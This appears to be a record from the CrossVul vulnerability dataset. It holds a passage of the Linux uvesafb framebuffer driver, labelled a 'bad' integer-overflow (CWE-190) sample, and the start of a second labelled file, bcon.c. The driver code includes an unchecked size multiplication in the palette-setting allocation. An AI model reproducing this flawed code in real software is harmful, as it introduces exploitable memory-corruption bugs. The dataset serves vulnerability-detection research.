fb_find_best_mode(&info->var, &info->modelist);
if (mode) {
fb_videomode_to_var(&info->var, mode);
} else {
modeid = par->vbe_modes[0].mode_id;
uvesafb_setup_var(&info->var, info,
&par->vbe_modes[modeid]);
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60,
&info->var, info);
goto gotmode;
}
}
/* Look for a matching VBE mode. */
modeid = uvesafb_vbe_find_mode(par, info->var.xres, info->var.yres,
info->var.bits_per_pixel, UVESAFB_EXACT_RES);
if (modeid == -1)
return -EINVAL;
uvesafb_setup_var(&info->var, info, &par->vbe_modes[modeid]);
gotmode:
/*
* If we are not VBE3.0+ compliant, we're done -- the BIOS will
* ignore our timings anyway.
*/
if (par->vbe_ib.vbe_version < 0x0300 || par->nocrtc)
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60,
&info->var, info);
return modeid;
}
static int uvesafb_setpalette(struct uvesafb_pal_entry *entries, int count,
int start, struct fb_info *info)
{
struct uvesafb_ktask *task;
#ifdef CONFIG_X86
struct uvesafb_par *par = info->par;
int i = par->mode_idx;
#endif
int err = 0;
/*
* We support palette modifications for 8 bpp modes only, so
* there can never be more than 256 entries.
*/
if (start + count > 256)
return -EINVAL;
#ifdef CONFIG_X86
/* Use VGA registers if mode is VGA-compatible. */
if (i >= 0 && i < par->vbe_modes_cnt &&
par->vbe_modes[i].mode_attr & VBE_MODE_VGACOMPAT) {
for (i = 0; i < count; i++) {
outb_p(start + i, dac_reg);
outb_p(entries[i].red, dac_val);
outb_p(entries[i].green, dac_val);
outb_p(entries[i].blue, dac_val);
}
}
#ifdef CONFIG_X86_32
else if (par->pmi_setpal) {
__asm__ __volatile__(
"call *(%%esi)"
: /* no return value */
: "a" (0x4f09), /* EAX */
"b" (0), /* EBX */
"c" (count), /* ECX */
"d" (start), /* EDX */
"D" (entries), /* EDI */
"S" (&par->pmi_pal)); /* ESI */
}
#endif /* CONFIG_X86_32 */
else
#endif /* CONFIG_X86 */
{
task = uvesafb_prep();
if (!task)
return -ENOMEM;
task->t.regs.eax = 0x4f09;
task->t.regs.ebx = 0x0;
task->t.regs.ecx = count;
task->t.regs.edx = start;
task->t.flags = TF_BUF_ESDI;
task->t.buf_len = sizeof(struct uvesafb_pal_entry) * count;
task->buf = entries;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) != 0x004f)
err = 1;
uvesafb_free(task);
}
return err;
}
static int uvesafb_setcolreg(unsigned regno, unsigned red, unsigned green,
unsigned blue, unsigned transp,
struct fb_info *info)
{
struct uvesafb_pal_entry entry;
int shift = 16 - dac_width;
int err = 0;
if (regno >= info->cmap.len)
return -EINVAL;
if (info->var.bits_per_pixel == 8) {
entry.red = red >> shift;
entry.green = green >> shift;
entry.blue = blue >> shift;
entry.pad = 0;
err = uvesafb_setpalette(&entry, 1, regno, info);
} else if (regno < 16) {
switch (info->var.bits_per_pixel) {
case 16:
if (info->var.red.offset == 10) {
/* 1:5:5:5 */
((u32 *) (info->pseudo_palette))[regno] =
((red & 0xf800) >> 1) |
((green & 0xf800) >> 6) |
((blue & 0xf800) >> 11);
} else {
/* 0:5:6:5 */
((u32 *) (info->pseudo_palette))[regno] =
((red & 0xf800) ) |
((green & 0xfc00) >> 5) |
((blue & 0xf800) >> 11);
}
break;
case 24:
case 32:
red >>= 8;
green >>= 8;
blue >>= 8;
((u32 *)(info->pseudo_palette))[regno] =
(red << info->var.red.offset) |
(green << info->var.green.offset) |
(blue << info->var.blue.offset);
break;
}
}
return err;
}
static int uvesafb_setcmap(struct fb_cmap *cmap, struct fb_info *info)
{
struct uvesafb_pal_entry *entries;
int shift = 16 - dac_width;
int i, err = 0;
if (info->var.bits_per_pixel == 8) {
if (cmap->start + cmap->len > info->cmap.start +
info->cmap.len || cmap->start < info->cmap.start)
return -EINVAL;
entries = kmalloc(sizeof(*entries) * cmap->len, GFP_KERNEL);
if (!entries)
return -ENOMEM;
for (i = 0; i < cmap->len; i++) {
entries[i].red = cmap->red[i] >> shift;
entries[i].green = cmap->green[i] >> shift;
entries[i].blue = cmap->blue[i] >> shift;
entries[i].pad = 0;
}
err = uvesafb_setpalette(entries, cmap->len, cmap->start, info);
kfree(entries);
} else {
/*
* For modes with bpp > 8, we only set the pseudo palette in
* the fb_info struct. We rely on uvesafb_setcolreg to do all
* sanity checking.
*/
for (i = 0; i < cmap->len; i++) {
err |= uvesafb_setcolreg(cmap->start + i, cmap->red[i],
cmap->green[i], cmap->blue[i],
0, info);
}
}
return err;
}
static int uvesafb_pan_display(struct fb_var_screeninfo *var,
struct fb_info *info)
{
#ifdef CONFIG_X86_32
int offset;
struct uvesafb_par *par = info->par;
offset = (var->yoffset * info->fix.line_length + var->xoffset) / 4;
/*
* It turns out it's not the best idea to do panning via vm86,
* so we only allow it if we have a PMI.
*/
if (par->pmi_start) {
__asm__ __volatile__(
"call *(%%edi)"
: /* no return value */
: "a" (0x4f07), /* EAX */
"b" (0), /* EBX */
"c" (offset), /* ECX */
"d" (offset >> 16), /* EDX */
"D" (&par->pmi_start)); /* EDI */
}
#endif
return 0;
}
static int uvesafb_blank(int blank, struct fb_info *info)
{
struct uvesafb_ktask *task;
int err = 1;
#ifdef CONFIG_X86
struct uvesafb_par *par = info->par;
if (par->vbe_ib.capabilities & VBE_CAP_VGACOMPAT) {
int loop = 10000;
u8 seq = 0, crtc17 = 0;
if (blank == FB_BLANK_POWERDOWN) {
seq = 0x20;
crtc17 = 0x00;
err = 0;
} else {
seq = 0x00;
crtc17 = 0x80;
err = (blank == FB_BLANK_UNBLANK) ? 0 : -EINVAL;
}
vga_wseq(NULL, 0x00, 0x01);
seq |= vga_rseq(NULL, 0x01) & ~0x20;
vga_wseq(NULL, 0x00, seq);
crtc17 |= vga_rcrt(NULL, 0x17) & ~0x80;
while (loop--);
vga_wcrt(NULL, 0x17, crtc17);
vga_wseq(NULL, 0x00, 0x03);
} else
#endif /* CONFIG_X86 */
{
task = uvesafb_prep();
if (!task)
return -ENOMEM;
task->t.regs.eax = 0x4f10;
switch (blank) {
case FB_BLANK_UNBLANK:
task->t.regs.ebx = 0x0001;
break;
case FB_BLANK_NORMAL:
task->t.regs.ebx = 0x0101; /* standby */
break;
case FB_BLANK_POWERDOWN:
task->t.regs.ebx = 0x0401; /* powerdown */
break;
default:
goto out;
}
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f)
err = 1;
out: uvesafb_free(task);
}
return err;
}
static int uvesafb_open(struct fb_info *info, int user)
{
struct uvesafb_par *par = info->par;
int cnt = atomic_read(&par->ref_count);
u8 *buf = NULL;
if (!cnt && par->vbe_state_size) {
buf = uvesafb_vbe_state_save(par);
if (IS_ERR(buf)) {
pr_warn("save hardware state failed, error code is %ld!\n",
PTR_ERR(buf));
} else {
par->vbe_state_orig = buf;
}
}
atomic_inc(&par->ref_count);
return 0;
}
static int uvesafb_release(struct fb_info *info, int user)
{
struct uvesafb_ktask *task = NULL;
struct uvesafb_par *par = info->par;
int cnt = atomic_read(&par->ref_count);
if (!cnt)
return -EINVAL;
if (cnt != 1)
goto out;
task = uvesafb_prep();
if (!task)
goto out;
/* First, try to set the standard 80x25 text mode. */
task->t.regs.eax = 0x0003;
uvesafb_exec(task);
/*
* Now try to restore whatever hardware state we might have
* saved when the fb device was first opened.
*/
uvesafb_vbe_state_restore(par, par->vbe_state_orig);
out:
atomic_dec(&par->ref_count);
uvesafb_free(task);
return 0;
}
static int uvesafb_set_par(struct fb_info *info)
{
struct uvesafb_par *par = info->par;
struct uvesafb_ktask *task = NULL;
struct vbe_crtc_ib *crtc = NULL;
struct vbe_mode_ib *mode = NULL;
int i, err = 0, depth = info->var.bits_per_pixel;
if (depth > 8 && depth != 32)
depth = info->var.red.length + info->var.green.length +
info->var.blue.length;
i = uvesafb_vbe_find_mode(par, info->var.xres, info->var.yres, depth,
UVESAFB_EXACT_RES | UVESAFB_EXACT_DEPTH);
if (i >= 0)
mode = &par->vbe_modes[i];
else
return -EINVAL;
task = uvesafb_prep();
if (!task)
return -ENOMEM;
setmode:
task->t.regs.eax = 0x4f02;
task->t.regs.ebx = mode->mode_id | 0x4000; /* use LFB */
if (par->vbe_ib.vbe_version >= 0x0300 && !par->nocrtc &&
info->var.pixclock != 0) {
task->t.regs.ebx |= 0x0800; /* use CRTC data */
task->t.flags = TF_BUF_ESDI;
crtc = kzalloc(sizeof(struct vbe_crtc_ib), GFP_KERNEL);
if (!crtc) {
err = -ENOMEM;
goto out;
}
crtc->horiz_start = info->var.xres + info->var.right_margin;
crtc->horiz_end = crtc->horiz_start + info->var.hsync_len;
crtc->horiz_total = crtc->horiz_end + info->var.left_margin;
crtc->vert_start = info->var.yres + info->var.lower_margin;
crtc->vert_end = crtc->vert_start + info->var.vsync_len;
crtc->vert_total = crtc->vert_end + info->var.upper_margin;
crtc->pixel_clock = PICOS2KHZ(info->var.pixclock) * 1000;
crtc->refresh_rate = (u16)(100 * (crtc->pixel_clock /
(crtc->vert_total * crtc->horiz_total)));
if (info->var.vmode & FB_VMODE_DOUBLE)
crtc->flags |= 0x1;
if (info->var.vmode & FB_VMODE_INTERLACED)
crtc->flags |= 0x2;
if (!(info->var.sync & FB_SYNC_HOR_HIGH_ACT))
crtc->flags |= 0x4;
if (!(info->var.sync & FB_SYNC_VERT_HIGH_ACT))
crtc->flags |= 0x8;
memcpy(&par->crtc, crtc, sizeof(*crtc));
} else {
memset(&par->crtc, 0, sizeof(*crtc));
}
task->t.buf_len = sizeof(struct vbe_crtc_ib);
task->buf = &par->crtc;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
/*
* The mode switch might have failed because we tried to
* use our own timings. Try again with the default timings.
*/
if (crtc != NULL) {
pr_warn("mode switch failed (eax=0x%x, err=%d) - trying again with default timings\n",
task->t.regs.eax, err);
uvesafb_reset(task);
kfree(crtc);
crtc = NULL;
info->var.pixclock = 0;
goto setmode;
} else {
pr_err("mode switch failed (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
err = -EINVAL;
goto out;
}
}
par->mode_idx = i;
/* For 8bpp modes, always try to set the DAC to 8 bits. */
if (par->vbe_ib.capabilities & VBE_CAP_CAN_SWITCH_DAC &&
mode->bits_per_pixel <= 8) {
uvesafb_reset(task);
task->t.regs.eax = 0x4f08;
task->t.regs.ebx = 0x0800;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f ||
((task->t.regs.ebx & 0xff00) >> 8) != 8) {
dac_width = 6;
} else {
dac_width = 8;
}
}
info->fix.visual = (info->var.bits_per_pixel == 8) ?
FB_VISUAL_PSEUDOCOLOR : FB_VISUAL_TRUECOLOR;
info->fix.line_length = mode->bytes_per_scan_line;
out:
kfree(crtc);
uvesafb_free(task);
return err;
}
static void uvesafb_check_limits(struct fb_var_screeninfo *var,
struct fb_info *info)
{
const struct fb_videomode *mode;
struct uvesafb_par *par = info->par;
/*
* If pixclock is set to 0, then we're using default BIOS timings
* and thus don't have to perform any checks here.
*/
if (!var->pixclock)
return;
if (par->vbe_ib.vbe_version < 0x0300) {
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60, var, info);
return;
}
if (!fb_validate_mode(var, info))
return;
mode = fb_find_best_mode(var, &info->modelist);
if (mode) {
if (mode->xres == var->xres && mode->yres == var->yres &&
!(mode->vmode & (FB_VMODE_INTERLACED | FB_VMODE_DOUBLE))) {
fb_videomode_to_var(var, mode);
return;
}
}
if (info->monspecs.gtf && !fb_get_mode(FB_MAXTIMINGS, 0, var, info))
return;
/* Use default refresh rate */
var->pixclock = 0;
}
static int uvesafb_check_var(struct fb_var_screeninfo *var,
struct fb_info *info)
{
struct uvesafb_par *par = info->par;
struct vbe_mode_ib *mode = NULL;
int match = -1;
int depth = var->red.length + var->green.length + var->blue.length;
/*
* Various apps will use bits_per_pixel to set the color depth,
* which is theoretically incorrect, but which we'll try to handle
* here.
*/
if (depth == 0 || abs(depth - var->bits_per_pixel) >= 8)
depth = var->bits_per_pixel;
match = uvesafb_vbe_find_mode(par, var->xres, var->yres, depth,
UVESAFB_EXACT_RES);
if (match == -1)
return -EINVAL;
mode = &par->vbe_modes[match];
uvesafb_setup_var(var, info, mode);
/*
* Check whether we have remapped enough memory for this mode.
* We might be called at an early stage, when we haven't remapped
* any memory yet, in which case we simply skip the check.
*/
if (var->yres * mode->bytes_per_scan_line > info->fix.smem_len
&& info->fix.smem_len)
return -EINVAL;
if ((var->vmode & FB_VMODE_DOUBLE) &&
!(par->vbe_modes[match].mode_attr & 0x100))
var->vmode &= ~FB_VMODE_DOUBLE;
if ((var->vmode & FB_VMODE_INTERLACED) &&
!(par->vbe_modes[match].mode_attr & 0x200))
var->vmode &= ~FB_VMODE_INTERLACED;
uvesafb_check_limits(var, info);
var->xres_virtual = var->xres;
var->yres_virtual = (par->ypan) ?
info->fix.smem_len / mode->bytes_per_scan_line :
var->yres;
return 0;
}
static struct fb_ops uvesafb_ops = {
.owner = THIS_MODULE,
.fb_open = uvesafb_open,
.fb_release = uvesafb_release,
.fb_setcolreg = uvesafb_setcolreg,
.fb_setcmap = uvesafb_setcmap,
.fb_pan_display = uvesafb_pan_display,
.fb_blank = uvesafb_blank,
.fb_fillrect = cfb_fillrect,
.fb_copyarea = cfb_copyarea,
.fb_imageblit = cfb_imageblit,
.fb_check_var = uvesafb_check_var,
.fb_set_par = uvesafb_set_par,
};
static void uvesafb_init_info(struct fb_info *info, struct vbe_mode_ib *mode)
{
unsigned int size_vmode;
unsigned int size_remap;
unsigned int size_total;
struct uvesafb_par *par = info->par;
int i, h;
info->pseudo_palette = ((u8 *)info->par + sizeof(struct uvesafb_par));
info->fix = uvesafb_fix;
info->fix.ypanstep = par->ypan ? 1 : 0;
info->fix.ywrapstep = (par->ypan > 1) ? 1 : 0;
/* Disable blanking if the user requested so. */
if (!blank)
info->fbops->fb_blank = NULL;
/*
* Find out how much IO memory is required for the mode with
* the highest resolution.
*/
size_remap = 0;
for (i = 0; i < par->vbe_modes_cnt; i++) {
h = par->vbe_modes[i].bytes_per_scan_line *
par->vbe_modes[i].y_res;
if (h > size_remap)
size_remap = h;
}
size_remap *= 2;
/*
* size_vmode -- that is the amount of memory needed for the
* used video mode, i.e. the minimum amount of
* memory we need.
*/
size_vmode = info->var.yres * mode->bytes_per_scan_line;
/*
* size_total -- all video memory we have. Used for mtrr
* entries, resource allocation and bounds
* checking.
*/
size_total = par->vbe_ib.total_memory * 65536;
if (vram_total)
size_total = vram_total * 1024 * 1024;
if (size_total < size_vmode)
size_total = size_vmode;
/*
* size_remap -- the amount of video memory we are going to
* use for vesafb. With modern cards it is no
* option to simply use size_total as that
* wastes plenty of kernel address space.
*/
if (vram_remap)
size_remap = vram_remap * 1024 * 1024;
if (size_remap < size_vmode)
size_remap = size_vmode;
if (size_remap > size_total)
size_remap = size_total;
info->fix.smem_len = size_remap;
info->fix.smem_start = mode->phys_base_ptr;
/*
* We have to set yres_virtual here because when setup_var() was
* called, smem_len wasn't defined yet.
*/
info->var.yres_virtual = info->fix.smem_len /
mode->bytes_per_scan_line;
if (par->ypan && info->var.yres_virtual > info->var.yres) {
pr_info("scrolling: %s using protected mode interface, yres_virtual=%d\n",
(par->ypan > 1) ? "ywrap" : "ypan",
info->var.yres_virtual);
} else {
pr_info("scrolling: redraw\n");
info->var.yres_virtual = info->var.yres;
par->ypan = 0;
}
info->flags = FBINFO_FLAG_DEFAULT |
(par->ypan ? FBINFO_HWACCEL_YPAN : 0);
if (!par->ypan)
info->fbops->fb_pan_display = NULL;
}
static void uvesafb_init_mtrr(struct fb_info *info)
{
struct uvesafb_par *par = info->par;
if (mtrr && !(info->fix.smem_start & (PAGE_SIZE - 1))) {
int temp_size = info->fix.smem_len;
int rc;
/* Find the largest power-of-two */
temp_size = roundup_pow_of_two(temp_size);
/* Try and find a power of two to add */
do {
rc = arch_phys_wc_add(info->fix.smem_start, temp_size);
temp_size >>= 1;
} while (temp_size >= PAGE_SIZE && rc == -EINVAL);
if (rc >= 0)
par->mtrr_handle = rc;
}
}
static void uvesafb_ioremap(struct fb_info *info)
{
info->screen_base = ioremap_wc(info->fix.smem_start, info->fix.smem_len);
}
static ssize_t uvesafb_show_vbe_ver(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
return snprintf(buf, PAGE_SIZE, "%.4x\n", par->vbe_ib.vbe_version);
}
static DEVICE_ATTR(vbe_version, S_IRUGO, uvesafb_show_vbe_ver, NULL);
static ssize_t uvesafb_show_vbe_modes(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
int ret = 0, i;
for (i = 0; i < par->vbe_modes_cnt && ret < PAGE_SIZE; i++) {
ret += snprintf(buf + ret, PAGE_SIZE - ret,
"%dx%d-%d, 0x%.4x\n",
par->vbe_modes[i].x_res, par->vbe_modes[i].y_res,
par->vbe_modes[i].depth, par->vbe_modes[i].mode_id);
}
return ret;
}
static DEVICE_ATTR(vbe_modes, S_IRUGO, uvesafb_show_vbe_modes, NULL);
static ssize_t uvesafb_show_vendor(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_vendor_name_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n", (char *)
(&par->vbe_ib) + par->vbe_ib.oem_vendor_name_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_vendor, S_IRUGO, uvesafb_show_vendor, NULL);
static ssize_t uvesafb_show_product_name(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_product_name_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n", (char *)
(&par->vbe_ib) + par->vbe_ib.oem_product_name_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_product_name, S_IRUGO, uvesafb_show_product_name, NULL);
static ssize_t uvesafb_show_product_rev(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_product_rev_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n", (char *)
(&par->vbe_ib) + par->vbe_ib.oem_product_rev_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_product_rev, S_IRUGO, uvesafb_show_product_rev, NULL);
static ssize_t uvesafb_show_oem_string(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_string_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n",
(char *)(&par->vbe_ib) + par->vbe_ib.oem_string_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_string, S_IRUGO, uvesafb_show_oem_string, NULL);
static ssize_t uvesafb_show_nocrtc(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
return snprintf(buf, PAGE_SIZE, "%d\n", par->nocrtc);
}
static ssize_t uvesafb_store_nocrtc(struct device *dev,
struct device_attribute *attr, const char *buf, size_t count)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (count > 0) {
if (buf[0] == '0')
par->nocrtc = 0;
else
par->nocrtc = 1;
}
return count;
}
static DEVICE_ATTR(nocrtc, S_IRUGO | S_IWUSR, uvesafb_show_nocrtc,
uvesafb_store_nocrtc);
static struct attribute *uvesafb_dev_attrs[] = {
&dev_attr_vbe_version.attr,
&dev_attr_vbe_modes.attr,
&dev_attr_oem_vendor.attr,
&dev_attr_oem_product_name.attr,
&dev_attr_oem_product_rev.attr,
&dev_attr_oem_string.attr,
&dev_attr_nocrtc.attr,
NULL,
};
static const struct attribute_group uvesafb_dev_attgrp = {
.name = NULL,
.attrs = uvesafb_dev_attrs,
};
static int uvesafb_probe(struct platform_device *dev)
{
struct fb_info *info;
struct vbe_mode_ib *mode = NULL;
struct uvesafb_par *par;
int err = 0, i;
info = framebuffer_alloc(sizeof(*par) + sizeof(u32) * 256, &dev->dev);
if (!info)
return -ENOMEM;
par = info->par;
err = uvesafb_vbe_init(info);
if (err) {
pr_err("vbe_init() failed with %d\n", err);
goto out;
}
info->fbops = &uvesafb_ops;
i = uvesafb_vbe_init_mode(info);
if (i < 0) {
err = -EINVAL;
goto out;
} else {
mode = &par->vbe_modes[i];
}
if (fb_alloc_cmap(&info->cmap, 256, 0) < 0) {
err = -ENXIO;
goto out;
}
uvesafb_init_info(info, mode);
if (!request_region(0x3c0, 32, "uvesafb")) {
pr_err("request region 0x3c0-0x3e0 failed\n");
err = -EIO;
goto out_mode;
}
if (!request_mem_region(info->fix.smem_start, info->fix.smem_len,
"uvesafb")) {
pr_err("cannot reserve video memory at 0x%lx\n",
info->fix.smem_start);
err = -EIO;
goto out_reg;
}
uvesafb_init_mtrr(info);
uvesafb_ioremap(info);
if (!info->screen_base) {
pr_err("abort, cannot ioremap 0x%x bytes of video memory at 0x%lx\n",
info->fix.smem_len, info->fix.smem_start);
err = -EIO;
goto out_mem;
}
platform_set_drvdata(dev, info);
if (register_framebuffer(info) < 0) {
pr_err("failed to register framebuffer device\n");
err = -EINVAL;
goto out_unmap;
}
pr_info("framebuffer at 0x%lx, mapped to 0x%p, using %dk, total %dk\n",
info->fix.smem_start, info->screen_base,
info->fix.smem_len / 1024, par->vbe_ib.total_memory * 64);
fb_info(info, "%s frame buffer device\n", info->fix.id);
err = sysfs_create_group(&dev->dev.kobj, &uvesafb_dev_attgrp);
if (err != 0)
fb_warn(info, "failed to register attributes\n");
return 0;
out_unmap:
iounmap(info->screen_base);
out_mem:
release_mem_region(info->fix.smem_start, info->fix.smem_len);
out_reg:
release_region(0x3c0, 32);
out_mode:
if (!list_empty(&info->modelist))
fb_destroy_modelist(&info->modelist);
fb_destroy_modedb(info->monspecs.modedb);
fb_dealloc_cmap(&info->cmap);
out:
kfree(par->vbe_modes);
framebuffer_release(info);
return err;
}
static int uvesafb_remove(struct platform_device *dev)
{
struct fb_info *info = platform_get_drvdata(dev);
if (info) {
struct uvesafb_par *par = info->par;
sysfs_remove_group(&dev->dev.kobj, &uvesafb_dev_attgrp);
unregister_framebuffer(info);
release_region(0x3c0, 32);
iounmap(info->screen_base);
arch_phys_wc_del(par->mtrr_handle);
release_mem_region(info->fix.smem_start, info->fix.smem_len);
fb_destroy_modedb(info->monspecs.modedb);
fb_dealloc_cmap(&info->cmap);
kfree(par->vbe_modes);
kfree(par->vbe_state_orig);
kfree(par->vbe_state_saved);
framebuffer_release(info);
}
return 0;
}
static struct platform_driver uvesafb_driver = {
.probe = uvesafb_probe,
.remove = uvesafb_remove,
.driver = {
.name = "uvesafb",
},
};
static struct platform_device *uvesafb_device;
#ifndef MODULE
static int uvesafb_setup(char *options)
{
char *this_opt;
if (!options || !*options)
return 0;
while ((this_opt = strsep(&options, ",")) != NULL) {
if (!*this_opt) continue;
if (!strcmp(this_opt, "redraw"))
ypan = 0;
else if (!strcmp(this_opt, "ypan"))
ypan = 1;
else if (!strcmp(this_opt, "ywrap"))
ypan = 2;
else if (!strcmp(this_opt, "vgapal"))
pmi_setpal = 0;
else if (!strcmp(this_opt, "pmipal"))
pmi_setpal = 1;
else if (!strncmp(this_opt, "mtrr:", 5))
mtrr = simple_strtoul(this_opt+5, NULL, 0);
else if (!strcmp(this_opt, "nomtrr"))
mtrr = 0;
else if (!strcmp(this_opt, "nocrtc"))
nocrtc = 1;
else if (!strcmp(this_opt, "noedid"))
noedid = 1;
else if (!strcmp(this_opt, "noblank"))
blank = 0;
else if (!strncmp(this_opt, "vtotal:", 7))
vram_total = simple_strtoul(this_opt + 7, NULL, 0);
else if (!strncmp(this_opt, "vremap:", 7))
vram_remap = simple_strtoul(this_opt + 7, NULL, 0);
else if (!strncmp(this_opt, "maxhf:", 6))
maxhf = simple_strtoul(this_opt + 6, NULL, 0);
else if (!strncmp(this_opt, "maxvf:", 6))
maxvf = simple_strtoul(this_opt + 6, NULL, 0);
else if (!strncmp(this_opt, "maxclk:", 7))
maxclk = simple_strtoul(this_opt + 7, NULL, 0);
else if (!strncmp(this_opt, "vbemode:", 8))
vbemode = simple_strtoul(this_opt + 8, NULL, 0);
else if (this_opt[0] >= '0' && this_opt[0] <= '9') {
mode_option = this_opt;
} else {
pr_warn("unrecognized option %s\n", this_opt);
}
}
if (mtrr != 3 && mtrr != 0)
pr_warn("uvesafb: mtrr should be set to 0 or 3; %d is unsupported", mtrr);
return 0;
}
#endif /* !MODULE */
static ssize_t v86d_show(struct device_driver *dev, char *buf)
{
return snprintf(buf, PAGE_SIZE, "%s\n", v86d_path);
}
static ssize_t v86d_store(struct device_driver *dev, const char *buf,
size_t count)
{
strncpy(v86d_path, buf, PATH_MAX);
return count;
}
static DRIVER_ATTR_RW(v86d);
static int uvesafb_init(void)
{
int err;
#ifndef MODULE
char *option = NULL;
if (fb_get_options("uvesafb", &option))
return -ENODEV;
uvesafb_setup(option);
#endif
err = cn_add_callback(&uvesafb_cn_id, "uvesafb", uvesafb_cn_callback);
if (err)
return err;
err = platform_driver_register(&uvesafb_driver);
if (!err) {
uvesafb_device = platform_device_alloc("uvesafb", 0);
if (uvesafb_device)
err = platform_device_add(uvesafb_device);
else
err = -ENOMEM;
if (err) {
platform_device_put(uvesafb_device);
platform_driver_unregister(&uvesafb_driver);
cn_del_callback(&uvesafb_cn_id);
return err;
}
err = driver_create_file(&uvesafb_driver.driver,
&driver_attr_v86d);
if (err) {
pr_warn("failed to register attributes\n");
err = 0;
}
}
return err;
}
module_init(uvesafb_init);
static void uvesafb_exit(void)
{
struct uvesafb_ktask *task;
if (v86d_started) {
task = uvesafb_prep();
if (task) {
task->t.flags = TF_EXIT;
uvesafb_exec(task);
uvesafb_free(task);
}
}
cn_del_callback(&uvesafb_cn_id);
driver_remove_file(&uvesafb_driver.driver, &driver_attr_v86d);
platform_device_unregister(uvesafb_device);
platform_driver_unregister(&uvesafb_driver);
}
module_exit(uvesafb_exit);
static int param_set_scroll(const char *val, const struct kernel_param *kp)
{
ypan = 0;
if (!strcmp(val, "redraw"))
ypan = 0;
else if (!strcmp(val, "ypan"))
ypan = 1;
else if (!strcmp(val, "ywrap"))
ypan = 2;
else
return -EINVAL;
return 0;
}
static const struct kernel_param_ops param_ops_scroll = {
.set = param_set_scroll,
};
#define param_check_scroll(name, p) __param_check(name, p, void)
module_param_named(scroll, ypan, scroll, 0);
MODULE_PARM_DESC(scroll,
"Scrolling mode, set to 'redraw', 'ypan', or 'ywrap'");
module_param_named(vgapal, pmi_setpal, invbool, 0);
MODULE_PARM_DESC(vgapal, "Set palette using VGA registers");
module_param_named(pmipal, pmi_setpal, bool, 0);
MODULE_PARM_DESC(pmipal, "Set palette using PMI calls");
module_param(mtrr, uint, 0);
MODULE_PARM_DESC(mtrr,
"Memory Type Range Registers setting. Use 0 to disable.");
module_param(blank, bool, 0);
MODULE_PARM_DESC(blank, "Enable hardware blanking");
module_param(nocrtc, bool, 0);
MODULE_PARM_DESC(nocrtc, "Ignore CRTC timings when setting modes");
module_param(noedid, bool, 0);
MODULE_PARM_DESC(noedid,
"Ignore EDID-provided monitor limits when setting modes");
module_param(vram_remap, uint, 0);
MODULE_PARM_DESC(vram_remap, "Set amount of video memory to be used [MiB]");
module_param(vram_total, uint, 0);
MODULE_PARM_DESC(vram_total, "Set total amount of video memory [MiB]");
module_param(maxclk, ushort, 0);
MODULE_PARM_DESC(maxclk, "Maximum pixelclock [MHz], overrides EDID data");
module_param(maxhf, ushort, 0);
MODULE_PARM_DESC(maxhf,
"Maximum horizontal frequency [kHz], overrides EDID data");
module_param(maxvf, ushort, 0);
MODULE_PARM_DESC(maxvf,
"Maximum vertical frequency [Hz], overrides EDID data");
module_param(mode_option, charp, 0);
MODULE_PARM_DESC(mode_option,
"Specify initial video mode as \"<xres>x<yres>[-<bpp>][@<refresh>]\"");
module_param(vbemode, ushort, 0);
MODULE_PARM_DESC(vbemode,
"VBE mode number to set, overrides the 'mode' option");
module_param_string(v86d, v86d_path, PATH_MAX, 0660);
MODULE_PARM_DESC(v86d, "Path to the v86d userspace helper.");
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Michal Januszewski <spock@gentoo.org>");
MODULE_DESCRIPTION("Framebuffer driver for VBE2.0+ compliant graphics boards");
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_222_0 |
crossvul-cpp_data_bad_3983_0 | /* bcon.c */
/* Copyright 2009-2012 10gen Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <assert.h>
#include "bcon.h"
#ifndef NOT_REACHED
#define NOT_REACHED 0
#endif
#define ARRAY_INDEX_BUFFER_SIZE 9
char *bcon_errstr[] = {
"OK",
"ERROR",
"bcon document or nesting incomplete",
"bson finish error"
};
static int bcon_error(bson *b, const bcon *bc, size_t i, bcon_error_t err) {
b->err = err;
b->errstr = bcon_errstr[err];
return BCON_ERROR;
}
